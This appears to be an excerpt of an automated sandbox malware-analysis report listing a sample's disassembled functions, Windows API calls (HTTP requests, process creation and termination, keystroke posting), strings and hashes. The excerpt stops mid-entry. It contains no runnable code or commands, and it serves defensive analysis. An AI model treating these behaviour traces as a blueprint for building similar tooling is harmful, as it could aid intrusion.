_memset.LIBCMT ref: 001F9167
VariantInit.OLEAUT32(?), ref: 001F9238
VariantInit.OLEAUT32(?), ref: 001F9339
VariantClear.OLEAUT32(?), ref: 001F9343
VariantClear.OLEAUT32(?), ref: 001F93A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 001F91C8, 001F92F6, 001F93AE
,,!, xrefs: 001F91E5
Incorrect Object type in FOR..IN loop, xrefs: 001F931C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,!$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-1342065348
Opcode ID: c8156277782a588af52a7cdecee488c0e6c3e7858ac7bcbe574cad9ade92ca01
Instruction ID: 7506bb67d2f031ceba9bc1fa26c28d55c2b21dfe139dcb51b119cc909f2b78c2
Opcode Fuzzy Hash: c8156277782a588af52a7cdecee488c0e6c3e7858ac7bcbe574cad9ade92ca01
Instruction Fuzzy Hash: EE918E71E00219ABDF24EFA5C848FAEBBB8FF45714F108559FA15AB280D7709945CFA0

Function 001DA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,001DA439), ref: 001DA377

Strings

CLASSNN, xrefs: 001DA119
NAME, xrefs: 001DA1A9
INSTANCE, xrefs: 001DA285
CLASS, xrefs: 001DA0F6
REGEXPCLASS, xrefs: 001DA13C
TEXT, xrefs: 001DA2AE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 432fefb3aa78dcacac4e17001f08d69ab55a2fb34bf2ed8887ce097b00fdb405
Instruction ID: 012e7ba36990e5f09da083b2e562bd37dfe68e7b8d0cb4e5dd6a4d840d98c362
Opcode Fuzzy Hash: 432fefb3aa78dcacac4e17001f08d69ab55a2fb34bf2ed8887ce097b00fdb405
Instruction Fuzzy Hash: C991C671A00605AACF08EFA0C441BEDFBB5BF15300F94811AE859A7341DF31AA99DB91

Function 00182E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00182EAE

Part of subcall function 00181DB3: GetClientRect.USER32(?,?), ref: 00181DDC
Part of subcall function 00181DB3: GetWindowRect.USER32(?,?), ref: 00181E1D
Part of subcall function 00181DB3: ScreenToClient.USER32(?,?), ref: 00181E45

GetDC.USER32 ref: 001BCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001BCD45
SelectObject.GDI32(00000000,00000000), ref: 001BCD53
SelectObject.GDI32(00000000,00000000), ref: 001BCD68
ReleaseDC.USER32(?,00000000), ref: 001BCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001BCDFB

Strings

U, xrefs: 001BCCD0

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7abef6a79de961ca1e468cbf814c323007bfa8deaef574c4f2e3030dc9a03334
Instruction ID: 0e91619d17230d6a43a12b1438f2ef717674cf94260cf35e71b556419dda0d12
Opcode Fuzzy Hash: 7abef6a79de961ca1e468cbf814c323007bfa8deaef574c4f2e3030dc9a03334
Instruction Fuzzy Hash: A671EF35500209DFCF269FA4C884AEA7FB5FF49320F14427AED559A2A6C7318991DFE0

Function 001F1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001F1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001F1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 001F1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001F1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001F1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001F1B10
InternetCloseHandle.WININET(00000000), ref: 001F1B57

Part of subcall function 001F2483: GetLastError.KERNEL32(?,?,001F1817,00000000,00000000,00000001), ref: 001F2498
Part of subcall function 001F2483: SetEvent.KERNEL32(?,?,001F1817,00000000,00000000,00000001), ref: 001F24AD

Strings

, xrefs: 001F1B01

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 7dfa375a82a780ee98fc0d5c266882c84c2e9803ae567a135e7f225f2dca11df
Instruction ID: 57504928a0d4dc9020dabf2dc48a9d314f1f4243d32c6ed8e94a89f214b6152e
Opcode Fuzzy Hash: 7dfa375a82a780ee98fc0d5c266882c84c2e9803ae567a135e7f225f2dca11df
Instruction Fuzzy Hash: 62417DB1541218FFEB118F50CC89FFBBBACEF18354F04412AFA059A151E7B59E448BA1

Function 001F8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0020F910), ref: 001F8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0020F910), ref: 001F8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001F8ED6
SysFreeString.OLEAUT32(?), ref: 001F8F00

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: a307900012544e53274ead16c6fe1549d46f240a812357b915b73f10b5c24fee
Instruction ID: 54306514c0b94da7def2859a3416ce965ef23a815c797a519cb6aa21962b992a
Opcode Fuzzy Hash: a307900012544e53274ead16c6fe1549d46f240a812357b915b73f10b5c24fee
Instruction Fuzzy Hash: DAF1F771A00209EFDB14EF94C888EBEB7B9FF49314F148598FA15AB251DB31AE45CB50

Function 001FF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001FF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001FFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001FFA7C
CloseHandle.KERNEL32(?), ref: 001FFAAB
CloseHandle.KERNEL32(?), ref: 001FFB22

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 986ece5228921ac0e81da6d41fa774af408e9f80303f10782af6b9d327590cbc
Instruction ID: 863bbbb2396d21e6c437973a58a7d894b5c492f503cb485ec5e8d121d71766b4
Opcode Fuzzy Hash: 986ece5228921ac0e81da6d41fa774af408e9f80303f10782af6b9d327590cbc
Instruction Fuzzy Hash: EBE1B0312043459FCB14EF24C891B7ABBE1BF99354F18856DF9998B2A2CB71DC42CB52

Function 001E4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E3697,?), ref: 001E468B

Part of subcall function 001E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E3697,?), ref: 001E46A4

Part of subcall function 001E4A31: GetFileAttributesW.KERNEL32(?,001E370B), ref: 001E4A32

lstrcmpiW.KERNEL32(?,?), ref: 001E4D40
_wcscmp.LIBCMT ref: 001E4D5A
MoveFileW.KERNEL32(?,?), ref: 001E4D75

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: f0191385d327a1ed715042ab591dcc65e6cfa1a600d9b79466023985aa94a1c3
Instruction ID: cc041261a8890e7506a2bd4e9cb654f30d194c3f22e37ac30550e706234bea21
Opcode Fuzzy Hash: f0191385d327a1ed715042ab591dcc65e6cfa1a600d9b79466023985aa94a1c3
Instruction Fuzzy Hash: 2E5174B24087849BC765EBA4DC819DFB3ECAF95750F00092EF189D3152EF70A288C766

Function 00208645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002086FF

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 42fd03103287ad9f3de86974093dd4468189b16e8fb943f9e7ef9de96a4f97d5
Instruction ID: 5905a36e13e0c763818ea0562c5fae9beacefc9b6e3307c7cbd514a66342a012
Opcode Fuzzy Hash: 42fd03103287ad9f3de86974093dd4468189b16e8fb943f9e7ef9de96a4f97d5
Instruction Fuzzy Hash: 4851B334520319BFEB209F24DC89F9E7BA9AB05724F604111F990D61E3CFB2A9B0CB41

Function 00182B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001BC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001BC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001BC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001BC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001BC370
DestroyIcon.USER32(00000000), ref: 001BC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001BC39C
DestroyIcon.USER32(?), ref: 001BC3AB

Part of subcall function 0020A4AF: DeleteObject.GDI32(00000000), ref: 0020A4E8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: b993da0b36f3a307558c6c088c4a0736f6f785b9c9f6ee3f58c001e84066809d
Instruction ID: 3129b9f077a43cebb6ac182b9aa5c96370287546e8dfddfb45926efc59453d0a
Opcode Fuzzy Hash: b993da0b36f3a307558c6c088c4a0736f6f785b9c9f6ee3f58c001e84066809d
Instruction Fuzzy Hash: D9516874A00609AFDB25EF64DC45FAA7BF5FB18310F104528F942A72A1DB70AE90DF90

Function 001D966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001DA84C
Part of subcall function 001DA82C: GetCurrentThreadId.KERNEL32 ref: 001DA853
Part of subcall function 001DA82C: AttachThreadInput.USER32(00000000,?,001D9683,?,00000001), ref: 001DA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 001D968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001D96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001D96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 001D96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001D96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 001D96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001D96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D96FB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: dc514e982e9febd1d6bad481fca31c611390a3b86f682f362162a8c9cd164377
Instruction ID: 00dcb66ccd831ab26d0c03baf0968c61565a08a10f3b8032a6969e0b101677ea
Opcode Fuzzy Hash: dc514e982e9febd1d6bad481fca31c611390a3b86f682f362162a8c9cd164377
Instruction Fuzzy Hash: B011CEB1990318BEF6206B60AC8DF6A7A2DEB4C751F110426F654AB1A1CAF35C109AA4

Function 001D8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,001D853C,00000B00,?,?), ref: 001D892A
HeapAlloc.KERNEL32(00000000,?,001D853C,00000B00,?,?), ref: 001D8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D853C,00000B00,?,?), ref: 001D8946
GetCurrentProcess.KERNEL32(?,00000000,?,001D853C,00000B00,?,?), ref: 001D894E
DuplicateHandle.KERNEL32(00000000,?,001D853C,00000B00,?,?), ref: 001D8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,001D853C,00000B00,?,?), ref: 001D8961
GetCurrentProcess.KERNEL32(001D853C,00000000,?,001D853C,00000B00,?,?), ref: 001D8969
DuplicateHandle.KERNEL32(00000000,?,001D853C,00000B00,?,?), ref: 001D896C
CreateThread.KERNEL32(00000000,00000000,001D8992,00000000,00000000,00000000), ref: 001D8986

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 6c1855bc4b85cfddba401fadbfa48e8e7d61067b54e0adc88e6bfd772372912d
Instruction ID: 499f8343c7c39207ba028301c03272816770479fb637e01994e0562f1124cf91
Opcode Fuzzy Hash: 6c1855bc4b85cfddba401fadbfa48e8e7d61067b54e0adc88e6bfd772372912d
Instruction Fuzzy Hash: 3301AC75280304FFE660ABA5ED4DF677B6CEB89711F404421FA09DB591CA7098008A20

Function 001F9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 001F9BA4, 001F9EC8
Not an Object type, xrefs: 001F9B7B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 4a817c8802ed7789b71ec1150dbbac1052720a446417c6b72f22520159ba009a
Instruction ID: 71c02e56307f3c1c4dab6575776cf1b36adcbce7cf290bba052fbb6b33331c2c
Opcode Fuzzy Hash: 4a817c8802ed7789b71ec1150dbbac1052720a446417c6b72f22520159ba009a
Instruction Fuzzy Hash: 69C19171A0021D9FDF14EFA8D884BBEB7F5FB48314F158469EA05AB281E770AD45CB90

Function 001F975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 001D710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?,?,001D7455), ref: 001D7127
Part of subcall function 001D710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?), ref: 001D7142
Part of subcall function 001D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?), ref: 001D7150
Part of subcall function 001D710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?), ref: 001D7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 001F9806
_memset.LIBCMT ref: 001F9813
_memset.LIBCMT ref: 001F9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 001F9982
CoTaskMemFree.OLE32(?), ref: 001F998D

Strings

NULL Pointer assignment, xrefs: 001F99DB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 5803c18d1259269c884c52def96ac0dbc70c551ddb33d58439ba5749ee801948
Instruction ID: d9b511bdd64937344d0deefd7cb1d93888aac95131181cae37ede5e366a4e86c
Opcode Fuzzy Hash: 5803c18d1259269c884c52def96ac0dbc70c551ddb33d58439ba5749ee801948
Instruction Fuzzy Hash: 6B912871D0021DEBDB10EFA5DC44AEEBBB9AF18310F20415AF519A7291EB719A44CFA0

Function 00206D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00206E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00206E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00206E52
_wcscat.LIBCMT ref: 00206EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00206EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00206EF2

Strings

SysListView32, xrefs: 00206DF6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 1b4132ffbd740f1c2cd33e329e87dfdda3ccfde8f96c10492c482790dfb86870
Instruction ID: 0294eef5391f82091676e53237b807c0ed8d386a8cb6deb6fe258d1b19efef9d
Opcode Fuzzy Hash: 1b4132ffbd740f1c2cd33e329e87dfdda3ccfde8f96c10492c482790dfb86870
Instruction Fuzzy Hash: 7741C170A50309ABEB219F64CC89FEA77E8EF08350F10042AF584A71D2D7729DA48B60

Function 001FE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 001E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 001E3C7A
Part of subcall function 001E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 001E3C88
Part of subcall function 001E3C55: CloseHandle.KERNEL32(00000000), ref: 001E3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FE9A4
GetLastError.KERNEL32 ref: 001FE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 001FEA63
GetLastError.KERNEL32(00000000), ref: 001FEA6E
CloseHandle.KERNEL32(00000000), ref: 001FEAA3

Strings

SeDebugPrivilege, xrefs: 001FE9C2

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: bfbf6292849ab8d2a815a2f81b9aaf2aa7b2a4ad5b8b66f446cc959a95cdaa19
Instruction ID: 5c36db8151b5f1f209c1b1524a96bc3d1fe7d9509eaaf422a2f6c0d96b106e20
Opcode Fuzzy Hash: bfbf6292849ab8d2a815a2f81b9aaf2aa7b2a4ad5b8b66f446cc959a95cdaa19
Instruction Fuzzy Hash: 8841CC712002059FDB24EF14DC95F7EB7E5AF55314F088459FA069B3E2CBB0A948CB91

Function 001E2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

